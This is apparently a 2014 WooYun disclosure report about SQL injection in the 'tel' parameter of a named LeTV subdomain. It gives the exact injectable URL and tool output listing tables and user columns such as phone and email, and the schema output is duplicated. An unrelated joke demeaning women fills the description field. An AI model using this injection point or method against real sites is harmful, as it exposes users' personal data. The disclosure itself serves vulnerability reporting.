2014-04-29:细节已通知厂商并且等待厂商处理中
2014-04-29:厂商已经确认,细节仅向厂商公开
2014-05-09:细节向核心白帽子及相关领域专家公开
2014-05-19:细节向普通白帽子公开
2014-05-29:细节向实习白帽子公开
2014-06-13:细节向公众公开
现在的女生真TM会装,昨晚和几个同事KTV小聚,最后走的时候女神说她喝醉了,要我送她回家,我说你TMD喝果汁也会醉?!幸亏老子机灵,要不今晚又耽误我玩游戏了。
详细说明:问题站点:
http://gacfiatauto.hz.letv.com/
注射链接:
http://gacfiatauto.hz.letv.com/php/vogusernum.php?callback=jQuery171032845610193908215_1398744981011&tel=1&_=1398745012738
tel参数未作过滤,造成注射。
手工简单判断了下就丢工具去跑了
库,表
Database: viaggio
[2 tables]
+---------+
| vig_tp |
| viguser |
+---------+
Database: viaggio
Table: viguser
[8 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| city | varchar(20) |
| email | varchar(100) |
| flag | varchar(10) |
| id | int(20) |
| num | int(10) |
| prov | varchar(20) |
| tel | varchar(15) |
| username | varchar(100) |
+----------+--------------+
用户名 电话神马的 ~~
尽快修复吧!
库,表
Database: viaggio
[2 tables]
+---------+
| vig_tp |
| viguser |
+---------+
Database: viaggio
Table: viguser
[8 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| city | varchar(20) |
| email | varchar(100) |
| flag | varchar(10) |
| id | int(20) |
| num | int(10) |
| prov | varchar(20) |
| tel | varchar(15) |
| username | varchar(100) |
+----------+--------------+修复方案:
过滤
版权声明:转载请注明来源 卡卡@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:18
确认时间:2014-04-29 09:47
厂商回复:辛苦挖掘,我们尽快修复,另外,漏洞描述牛逼啊。。。
最新状态:暂无